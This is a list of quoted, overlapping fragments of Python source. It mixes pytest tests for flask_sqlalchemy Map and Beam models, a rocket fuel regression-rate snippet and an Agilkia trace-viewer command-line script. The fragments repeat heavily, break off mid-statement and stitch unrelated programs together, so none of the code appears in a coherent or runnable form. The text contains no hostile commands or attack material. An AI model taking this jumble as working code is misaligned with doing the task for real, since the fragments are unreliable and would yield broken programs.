instantiation", "in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________||", "sa from acondbs.models import Map, Beam # These tests are written primarily for", "tests are written primarily for the developer to understand # how models in", "another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app):", "Beam(name=\"beam1\", map=map1) # The relation has been already established assert map1 is beam1.map", "assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() #", "key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is None at", "assert beam1.beam_id is not None # The foreign key is correctly set assert", "= Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of", "a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def", "__________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key ''' map1 =", "one assert (nmaps + 1) == len(Map.query.all()) # the new map can be", "None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() #", "__________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with relation '''", "is None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1)", "primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is None", "Map) # 
__________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1", "None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id", "Map(name=\"map1\") # The primary key (map_id) is None at this point assert map1.map_id", "context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id", "from acondbs.models import Map, Beam # These tests are written primarily for the", "import sa from acondbs.models import Map, Beam # These tests are written primarily", "= Map(name=\"map1\") # The primary key (map_id) is None at this point assert", "''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the", "sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object", "app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer the", "test of adding an object ''' with app.app_context(): # save the initial number", "foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 =", "(map_id) is None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1)", "Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In", "new map can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first()", "context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple", "None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None", "can be retrived by the map_id in another context map1 = 
Map.query.filter_by(map_id=map_id).first() assert", "primary key (map_id) is None at this point assert map1.map_id is None with", "map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is", "how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of", "not None with app.app_context(): # The object can be retrived by the map_id", "(nmaps + 1) == len(Map.query.all()) # the new map can be retrieved in", "app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps is", "preserved in a different app context assert map1 is beam1.map assert beam1 is", "same Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A", "# The foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context():", "relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has", "adding an object ''' with app.app_context(): # save the initial number of the", "map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already", "None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys", "key (map_id) is None at this point assert map1.map_id is None with app.app_context():", "app.app_context(): # The object can be retrived by the map_id in another context", "by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name", "= len(Map.query.all()) # this instantiation doesn't need be within a app context map1", "map=map1) # The relation has been already established assert map1 is beam1.map assert", "sa.session.commit() # The primary keys are assigned assert map1.map_id is not None assert", "= Beam(name=\"beam1\", 
map=map1) # The relation has been already established assert map1 is", "be retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1'", "are written primarily for the developer to understand # how models in flask_sqlalchemy", "is preserved in a different app context assert map1 is beam1.map assert beam1", "set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first()", "# the new map can be retrieved in a different app context map1_", "keys are still None assert map1.map_id is None assert beam1.beam_id is None assert", "= map1.map_id assert map_id is not None with app.app_context(): # The object can", "in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding an", "primary and foreign keys are still None assert map1.map_id is None assert beam1.beam_id", "# These tests are written primarily for the developer to understand # how", "''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been", "app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A", "The primary key (map_id) is None at this point assert map1.map_id is None", "longer the same Python object assert map1 is not map1_ # __________________________________________________________________|| def", "The object can be retrived by the map_id in another context map1 =", "map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________||", "= Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns", 
"[beam1] == map1.beams # The primary and foreign keys are still None assert", "an object ''' with app.app_context(): # save the initial number of the maps", "with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation", "a different app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert", "the primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is", "map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query", "with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer", "map1.beams # The primary and foreign keys are still None assert map1.map_id is", "save the initial number of the maps to compare later nmaps = len(Map.query.all())", "the developer to understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def", "retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) #", "map1 = Map(name=\"map1\") # The primary key (map_id) is None at this point", "app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python", "sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id = map1.map_id", "not None # The foreign key is correctly set assert map1.map_id == beam1.input_map_id", "and foreign keys are still None assert map1.map_id is None assert beam1.beam_id is", "Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first()", "the commit, map_id is automatically assigned map_id = map1.map_id assert map_id is not", "in a different app context assert map1 is beam1.map assert beam1 is map1.beams[0]", "be retrieved 
in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map)", "same Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() #", "The primary keys are assigned assert map1.map_id is not None assert beam1.beam_id is", "is None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit()", "flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object", "sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps is increased", "not None assert beam1.beam_id is not None # The foreign key is correctly", "# __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with relation", "with app.app_context(): # The object can be retrived by the map_id in another", "within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context():", "assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object", "still None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is", "assert map1.map_id is not None assert beam1.beam_id is not None # The foreign", "None with app.app_context(): # The object can be retrived by the map_id in", "retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' ==", "is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically", "assert map1 is beam1.map assert [beam1] == map1.beams # The primary and foreign", "key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = 
Map.query.filter_by(name='map1').first()", "# The object can be retrived by the map_id in another context map1", "is beam1.map assert [beam1] == map1.beams # The primary and foreign keys are", "# After the commit, map_id is automatically assigned map_id = map1.map_id assert map_id", "has been already established assert map1 is beam1.map assert [beam1] == map1.beams #", "with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id is", "simple test about the primary key ''' map1 = Map(name=\"map1\") # The primary", "None assert beam1.beam_id is not None # The foreign key is correctly set", "need be within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit()", "commit, map_id is automatically assigned map_id = map1.map_id assert map_id is not None", "import Map, Beam # These tests are written primarily for the developer to", "beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The", "is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary", "map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer the same", "def test_primary_key(app): '''A simple test about the primary key ''' map1 = Map(name=\"map1\")", "map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app", "''' with app.app_context(): # save the initial number of the maps to compare", "'''A simple test of adding an object with relation ''' map1 = Map(name=\"map1\")", "object ''' with app.app_context(): # save the initial number of the maps to", "map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The" ]
[ "= 950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 #", "chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5", "w = initial fuel web thickness n = n + dn*dt # consume", "ox r_port = r_fo - w #fuel port radius; r_fo = inner combustion", "n = n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w)", "N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox", "n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 #", "(kg/kmol) m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox #", "fuel web thickness n = n + dn*dt # consume moles of ox", "MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox", "#ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0", "w = w - reg_rate*dt # w = initial fuel web thickness n", "core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 =", "0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent,", "n_reg = reg. rate exp.; a0 = reg. rate coeff. w = w", "rate exp.; a0 = reg. rate coeff. w = w - reg_rate*dt #", "FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox =", "thickness n = n + dn*dt # consume moles of ox m_f[i+1] =", "# Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2)", "reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. rate", "<gh_stars>1-10 rho_fuel = 950 L = 0.3048 #fuel core length CHECK r_fo =", "= #liquid ox mass in tank initial n = m_ox/MW_ox # moels of", "G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg.", "- w #fuel port radius; r_fo = inner combustion chamber radius G_ox =", "initial fuel web thickness n = n + dn*dt # consume moles of", "a0 = reg. rate coeff. 
w = w - reg_rate*dt # w =", "combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg #", "n = m_ox/MW_ox # moels of liquid ox r_port = r_fo - w", "initial n = m_ox/MW_ox # moels of liquid ox r_port = r_fo -", "# Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of", "Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial", "radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg =", "= 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber", "in tank initial n = m_ox/MW_ox # moels of liquid ox r_port =", "r_fo - w #fuel port radius; r_fo = inner combustion chamber radius G_ox", "flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg.", "reg. rate coeff. w = w - reg_rate*dt # w = initial fuel", "# Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX", "= inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate =", "chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg", "= reg. rate coeff. w = w - reg_rate*dt # w = initial", "= initial fuel web thickness n = n + dn*dt # consume moles", "# n_reg = reg. rate exp.; a0 = reg. rate coeff. w =", "r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate", "= reg. rate exp.; a0 = reg. rate coeff. w = w -", "reg. rate exp.; a0 = reg. rate coeff. w = w - reg_rate*dt", "= w - reg_rate*dt # w = initial fuel web thickness n =", "= n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) #", "exp.; a0 = reg. rate coeff. w = w - reg_rate*dt # w", "0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff", "rate exponent, FLUX EXP??? 
MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol)", "950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner", "0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass", "m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.;", "+ dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) # mass fuel", "port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass", "mass in tank initial n = m_ox/MW_ox # moels of liquid ox r_port", "(m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013", "m_ox/MW_ox # moels of liquid ox r_port = r_fo - w #fuel port", "Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP???", "a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression", "44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in", "rho_fuel = 950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2", "w #fuel port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2)", "moels of liquid ox r_port = r_fo - w #fuel port radius; r_fo", "- reg_rate*dt # w = initial fuel web thickness n = n +", "combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg =", "#fuel port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox", "L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion", "rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox", "radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 #", "reg_rate*dt # w = initial fuel web thickness n = n + dn*dt", "= 0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression rate", "CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155 #", "ox mass in tank initial n = m_ox/MW_ox # moels of liquid ox", "mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. 
rate exp.; a0 =", "weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n", "of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n =", "= 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate", "coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox =", "#fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0", "# moels of liquid ox r_port = r_fo - w #fuel port radius;", "= r_fo - w #fuel port radius; r_fo = inner combustion chamber radius", "radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux", "Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O", "EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid", "= m_ox/MW_ox # moels of liquid ox r_port = r_fo - w #fuel", "0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius", "# Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank", "= 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular", "inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg", "r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression", "#liquid ox mass in tank initial n = m_ox/MW_ox # moels of liquid", "tank initial n = m_ox/MW_ox # moels of liquid ox r_port = r_fo", "a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. rate coeff. w", "coeff. w = w - reg_rate*dt # w = initial fuel web thickness", "# w = initial fuel web thickness n = n + dn*dt #", "rate coeff. w = w - reg_rate*dt # w = initial fuel web", "= a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. 
rate coeff.", "r_port = r_fo - w #fuel port radius; r_fo = inner combustion chamber", "web thickness n = n + dn*dt # consume moles of ox m_f[i+1]", "m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox # moels", "Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg", "w - reg_rate*dt # w = initial fuel web thickness n = n", "length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155", "of liquid ox r_port = r_fo - w #fuel port radius; r_fo =", "= m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate", "liquid ox r_port = r_fo - w #fuel port radius; r_fo = inner", "= 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass", "n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) # mass", "exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox" ]
[ "help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red,", "summary of each trace, plus some general statistics. If the TraceSet is clustered,", ": {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number", "specify the 'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\"", "without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color", "df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of", "-*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet. It", "columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\",", "ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0,", "{len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count()", "It prints a one-line summary of each trace, plus some general statistics. 
If", "\")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1:", "and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for", "tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"====", "line program that prints a set of traces, plus some summary statistics.\"\"\" parser", "trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet", "= pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err", "in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses =", "pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how many got", "in clusters, by default. TODO: allow user to specify the 'Ok' status value", "statistics. 
If the TraceSet is clustered, traces will be displayed in clusters, by", "in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\",", "= agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we", "parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events", "1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if", "{action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok =", "general statistics. If the TraceSet is clustered, traces will be displayed in clusters,", "statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the", "{ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0", "add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line", "(i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for", "of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters :", "to specify the 'Ok' status value (e.g. 
--ok=200 for HTTP results) @author: <EMAIL>", "a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\",", "print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for", "allow user to specify the 'Ok' status value (e.g. --ok=200 for HTTP results)", "{percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0", "more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file", "good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals =", "= \" \" # prefix for each trace (plus one extra space) def", "pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A", "help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the", "status value (e.g. 
--ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as", "event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\",", "status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents", "\"\"\"From TraceSet DataFrame, creates a table of Actions showing how many got Ok", "pandas as pd import argparse from pathlib import Path import textwrap import agilkia", "traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\")", "clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\")", "data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals])", "(e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import", "\" # prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame,", "is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for", "parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int)", "main(): \"\"\"A command line program that prints a set of traces, plus some", "file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions", "that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file", "\"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status", "args.verbose: 
print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\"", "mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name", "actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this", "containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\",", "Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size()", "(default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args =", "TraceSet. It prints a one-line summary of each trace, plus some general statistics.", "that prints a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__,", "if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two", "= 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces :", "for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas()", "for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i]", "/ df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length :", "event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress", "= parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) 
if", "tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars", "\" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) >", "the 'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import", "prints a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)", "parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces", "information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing", "one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates", "-> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how many", "and 1=char. 
char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map)", "len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \"", "of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds:", "tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch", "ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts)", "parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args)", "some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such", "each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From", "in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars =", "downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row", "# print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: 